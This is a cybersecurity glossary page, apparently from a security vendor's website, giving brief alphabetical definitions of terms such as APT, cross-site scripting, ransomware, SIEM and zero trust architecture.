Cyber Glossary
Stumped by cybersecurity jargon? Enhance your security literacy with our comprehensive guide to key terms and concepts.
A
Advanced Persistent Threat (APT)
A sophisticated, targeted cyberattack in which an attacker gains unauthorized access to a network and remains undetected for an extended period.
Asset Discovery
The process of identifying all hardware and software devices within an organization's network environment.
Attack Surface
The sum of all possible points (vectors) where an unauthorized user can try to enter or extract data from an environment.
C
Cloud Security Posture Management (CSPM)
A set of security tools and practices designed to identify and remediate risks across cloud infrastructures.
Cross-Site Scripting (XSS)
A security vulnerability that allows an attacker to inject malicious client-side scripts into web pages viewed by other users.
Command and Control (C2)
Infrastructure used by attackers to communicate with and issue instructions to compromised systems or malware.
Common Vulnerability and Exposure (CVE)
A publicly listed record of a known cybersecurity vulnerability, each assigned a unique identifier such as CVE-2024-12345.
Common Vulnerability Scoring System (CVSS)
An open framework for communicating the characteristics and severity of software vulnerabilities on a scale from 0.0 to 10.0.
Credential Stuffing
An automated attack in which stolen username and password combinations are tested against multiple services to gain unauthorized access.
Cryptojacking
The unauthorized use of a victim's computing resources to mine cryptocurrency without their knowledge.
Cyber Kill Chain
A framework developed by Lockheed Martin that describes the stages of a cyberattack, from initial reconnaissance to exfiltration of data.
D
Denial of Service (DoS)
An attack meant to shut down a machine or network, making it inaccessible to its intended users.
Data Exfiltration
The unauthorized transfer of data from an organization's systems to an external destination controlled by an attacker.
Data Loss Prevention (DLP)
A set of technologies and policies that prevent sensitive data from leaving an organization's control through unauthorized channels.
DevSecOps
A software development approach that integrates security practices into every phase of the development and operations lifecycle.
Dynamic Application Security Testing (DAST)
A black-box testing method that evaluates a running application from the outside by simulating real-world attacks.
I
Identity and Access Management (IAM)
A framework of policies and technologies that ensures the right individuals can access the right resources at the right times for the right reasons.
Incident Response
The structured approach an organization uses to prepare for, detect, contain, and recover from a cybersecurity incident.
Intrusion Detection System (IDS)
A security tool that monitors network traffic or system activity for malicious behavior and alerts administrators when suspicious activity is detected.
Intrusion Prevention System (IPS)
A network security tool that monitors traffic and actively blocks or drops malicious packets in real time.
IoT Security
The practice of securing Internet of Things devices and the networks they connect to against unauthorized access and cyberattacks.
M
Malware
Any software intentionally designed to cause disruption to a computer, server, client, or network, or to gain unauthorized access to information.
Man-in-the-Middle Attack (MitM)
An attack in which an adversary secretly intercepts and potentially alters communications between two parties who believe they are communicating directly.
MITRE ATT&CK
A globally accessible knowledge base of adversary tactics and techniques based on real-world observations of cyberattacks.
Multi-Factor Authentication (MFA)
An authentication method that requires users to provide two or more verification factors before granting access to a system or application.
N
Network Access Control (NAC)
A security approach that enforces policy-driven access to a network based on the identity and health of connecting devices.
Network Segmentation
The practice of dividing a computer network into smaller subnetworks to contain security breaches and limit the blast radius of attacks.
P
Password Spraying
An attack that attempts a small number of commonly used passwords against a large number of accounts to avoid triggering account lockout mechanisms.
Patch Management
The systematic process of acquiring, testing, and applying updates to software, operating systems, and firmware to correct vulnerabilities and bugs.
Penetration Testing
An authorized simulated cyberattack on a computer system, network, or application performed to evaluate its security.
Phishing
A social engineering attack that uses deceptive emails, messages, or websites to trick users into revealing credentials or installing malware.
Privilege Escalation
The act of exploiting a vulnerability or misconfiguration to gain elevated access rights beyond what was originally granted.
Public Key Infrastructure (PKI)
A framework of roles, policies, and technologies used to create, manage, and revoke digital certificates that enable secure communications.
R
Ransomware
A type of malware that encrypts a victim's files or systems and demands payment in exchange for the decryption key.
Role-Based Access Control (RBAC)
An access control model that grants permissions to users based on their role within an organization rather than their individual identity.
S
Security Awareness Training
Educational programs designed to teach employees how to recognize and respond to cybersecurity threats, particularly social engineering and phishing attacks.
Security Information and Event Management (SIEM)
A platform that aggregates, correlates, and analyzes log data from across an organization's IT environment to detect threats and support compliance.
Security Operations Center (SOC)
A centralized team of security professionals responsible for continuously monitoring, detecting, and responding to cybersecurity threats.
Security Orchestration, Automation and Response (SOAR)
A category of security software that allows organizations to automate repetitive security tasks and coordinate responses across different tools and teams.
Social Engineering
Psychological manipulation of people into performing actions or divulging confidential information, bypassing technical security controls.
Spear Phishing
A targeted form of phishing that uses personalized information about a specific individual or organization to craft more convincing deceptive messages.
SQL Injection
A web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
Static Application Security Testing (SAST)
A white-box testing method that analyzes application source code or binary for security vulnerabilities without executing the program.
Supply Chain Attack
An attack that targets less-secure elements in the supply chain — such as third-party software vendors or build systems — to compromise downstream customers.
T
Threat Hunting
The proactive, human-led search for threats that have evaded automated security controls and are already present within a network.
Threat Intelligence
Evidence-based knowledge about cyber threats, including context, mechanisms, indicators of compromise, and actionable recommendations.
Transport Layer Security (TLS)
A cryptographic protocol that provides secure communication over a computer network, most commonly used to encrypt HTTPS web traffic.
V
Virtual Private Network (VPN)
A technology that creates an encrypted tunnel between a user's device and a remote server, securing data in transit and masking the user's IP address.
Vulnerability Management
The continuous practice of identifying, classifying, prioritizing, remediating, and verifying security vulnerabilities in an organization's systems.
Vulnerability Scanning
The automated process of probing systems, applications, and networks to identify known security weaknesses and misconfigurations.
Z
Zero-Day Vulnerability
A software security flaw that is known to the software vendor but has no patch or fix available.
Zero Trust Architecture
A security model based on the principle of "never trust, always verify" — requiring continuous authentication and authorization for all users, devices, and connections regardless of network location.
Platform
Solutions
